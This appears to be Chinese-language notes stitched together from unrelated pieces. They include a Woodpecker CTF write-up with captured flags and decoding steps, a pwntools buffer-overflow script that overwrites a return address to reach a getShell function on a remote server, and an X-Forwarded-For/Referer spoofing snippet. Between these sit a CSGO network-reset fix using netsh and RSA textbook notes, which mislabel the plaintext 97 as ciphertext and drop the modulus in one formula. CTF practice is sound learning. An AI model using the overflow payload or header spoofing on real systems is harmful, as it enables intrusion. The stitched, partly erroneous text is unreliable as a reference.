curl 神奇操作
curl --connect-timeout 2 -x 233.233.233.233:88888 https://www.baidu.com/ curl --connect-timeout 2 -x 233.233.233.233:88888 https://www.baidu.com/ 你知道网页的初始界面是什么吗?
用bp的repeter可以做,后来发现其实直接curl就行
[root@oao ~]# curl http://124.70.85.223/web3/index.php
Woodpeckerctf{faster_as_you_can}
[root@oao ~]#curl 扫码
woodpecker{Baidu_!}
flag{Shen_mE_p0_t1_Mu}
base64直接解码
使用Stegsolve.jar点几下然后扫码
解压后拍照
稍微有点意思
暴力解码凯撒https://paste.ubuntu.com/p/ddQXBc8Vjd/,然后
import base64
for i in range(1,30):
try:
str=input()
print(base64.b64decode(str))
except:
print("wa")这个题,用IDAPRO可以得到源代码

看键盘找密码
zip,然后看属性,发现:用winhex
解密代码如下,反过来就行
ans=[]
resarry=[153, 78, 177, 67, 178, 68, 165, 74, 167, 81, 165, 83, 168, 90, 150, 71, 167, 62, 163, 65, 163, 75, 171, 83, 187, 62, 177, 69, 161, 66, 177, 67, 167, 62, 148, 68, 163, 35, 161, 32, 176, 67, 161, 47, 180, 78, 169, 81, 163, 76, 167, 62, 171, 82, 161, 72, 175, 79, 177, 81, 163, 77, 182, 62, 115, 45, 161, 34, 150, 37, 99, 92]
for i in range(len(resarry)):
print(resarry[71-i])
if i%2==0:
ans.append(resarry[i]-66 +128)
else:
ans.append(resarry[i]+33 +128)
for i in range(len(ans)):
print(chr(ans[i]%128),end="")
print(ans)新佛曰和社会主义核心价值观两个解码组合,不是他们一血那么快我都不知道我方向部队,我还研究了半天的12位进制哈哈哈哈哈
油猴脚本是好东西
然后直接F12
画图解决
是个原题,我承认我百度做的,用winhex然后把01改成11就行了
啊啊啊,这个是我瞎子题,先把\n替换,base64,社工hits,考虑生活方面,然后考虑是不是qq号
然后qq名
好题
https://gchq.github.io/CyberChef/#recipe=XOR(%7B'option':'Hex','string':''%7D,'Standard',false/disabled)XOR_Brute_Force(1,100,0,'Standard',false,true,false,'')&input=dGxsZ3NmYGhmcXgxMzEyXHp6Z3AiIn4
打开这个网页就行
社工,看wifi名,有ele.me的图,然后从支付宝找那个wifi名开头的店
好烦,截图找不到了,重做
第一步,用连点器结果发现点到60还是不知道是啥,然后还是进了no_flag.php
打开F12看source,发现时间那里有个颜文字加密的js
解密吼
}]V2U})9]
然后进入flag.php
发现字符串拼接
然后在第一步看源代码,发现第一步有注释的php得到part1

然后第二部切换到.network
(第二部源代码提示过要看head)
拼手速
得到part2
拼接后得到flag
根据大佬给的WP,然后直接运行
from pwn import *
context.log_level = 'DEBUG'
context.terminal = ['terminator', '-x' ,'sh' , '-c']
p = remote("43.128.1.238",10001)
elf = ELF("pwn")
#libc = ELF('')
offset = 72
address = elf.symbols['getShell']
p.recv()
payload = 'A' * offset + p64(address).decode('unicode_escape')
p.send(payload)
p.interactive()
ook解码
套娃很严重
将jpg改为zip
然后解压
然后得到2.jpg
用oursec,密码123456可以得到flag.txt
VjJVeFl6QnRaVjlVTUY5WE1EQkVVRVZEUzJWeQ==
base64得到
V2UxYzBtZV9UMF9XMDBEUEVDS2Vy
然后加密大厨可以得到
https://gchq.github.io/CyberChef/#recipe=Magic(3,false,false,'')&input=VjJVeFl6QnRaVjlVTUY5WE1EQkVVRVZEUzJWeQ
嗯就这样
呃,竟然不是word隐写,我方向错了好多次。
后来发现福尔摩斯其实可以允许.==E
于是,福尔摩斯,可以得到一串字母
这个我还找到了您的csdn博客呢!
就这样啦
这次比赛,其实最大的感受就是每次打算学pwn,然后又来题,又要冲前几,特别特别累,还要做别的事情唉。不过还是很开心滴!
谢谢各位大佬出题!
如果有细节不够,欢迎叫我补充!!
csgo无法进入,黑屏闪退,尝试了各种办法,首先这是v社更新的bug,文件完整性是无缺失的,steam其他游戏可以进入,不要怀疑自己电脑的问题。
解决方法可以直接重置电脑网络配置。
用搜索框查找cmd,右键,以管理员运行
---12.11更新---
真的是,有人好蠢好蠢。复制这个↓
netsh advfirewall reset
netsh int ip reset
netsh int ipv6 reset
netsh winsock reset---↓复制上面的,按着这个一步一步来---
1、输入netsh advfirewall reset回车
2、输入netsh int ip reset回车
3、输入netsh int ipv6 reset回车
4、输入netsh winsock reset回车
然后重启电脑。
有公钥和私钥
1.单项计算容易,但逆向很难
模运算是单项函数
计算
$$ 3^3 mod 7 =6 $$
很容易
但是知道
$$ 3^xmod7=6 $$
计算x很难
对于一个数
$$ m^e mod N =c $$
其中e为秘钥,c为密文
$$ c^d mod N = m $$
其中d是解密的秘钥
将两个公式合并,可以得到
$$ m^{ed} \; mod \; N =m $$
那么可以得到
$$ m^{ed}\; \equiv \; m $$
欧拉函数:
$$ φ(p)=p-1 $$
其中p为质数
如果(p,q)=1,有这个性质
$$ φ(p*q)=φ(p)*φ(q) $$
不知道为啥
首先有欧拉定理:
$$ m^φ(n)\equiv 1 (mod \; n) $$
可以在等式的两端同时取k次幂
$$ (m^{φ(n)})^k\equiv 1^k (mod \; n) $$
然后等式两端同时乘以m
$$ m^{kφ(n)+1} \equiv m \; (mod \; n) $$
然后模运算变形
$$ m^{kφ(n)+1} \; mod \; n = m $$
这个式子和这个类似
$$ m^{ed} \; mod \; n =m $$
可以得到
$$ ed=kφ(n)+1 $$
然后可以选取k,n,e来获得d
我们可以知道
$$ d = \frac{kφ(n)+1}{e} $$
此时,如果e=3
取一个p=17,q=23,其中(17,23)=1
那么可以得到
$$ φ(17*23)=φ(391)=352 $$
e=3,k=5
$$ d=\frac{kφ(n)+1}{e}=\frac{5*352+ 1}{3}=587 $$
这样
e:公钥
d:私钥
都有啦
然后把 e:公钥和n:公布
当前
公钥e=3,私钥d=587,n=391
要加密的数据为97
$$ 97^3 \; mod \; 391 = 79 $$
97为加密后的密文
解密:
$$ 79^{587} \; mod = 97 $$
还原
用了587这个秘钥
嗯,暂时就这样啦
e需要满足:
$$ 1<e<φ(n) $$
且
$$ (e,φ(n))=1 $$
还有这个性质
$$ m^{kφ(n)} \; mod \;n =1 $$
其中n为前面欧拉函数的计算结果
在get请求直接添加就好啦
X-Forwarded-For: 123.123.123.123
Referer: https://www.google.com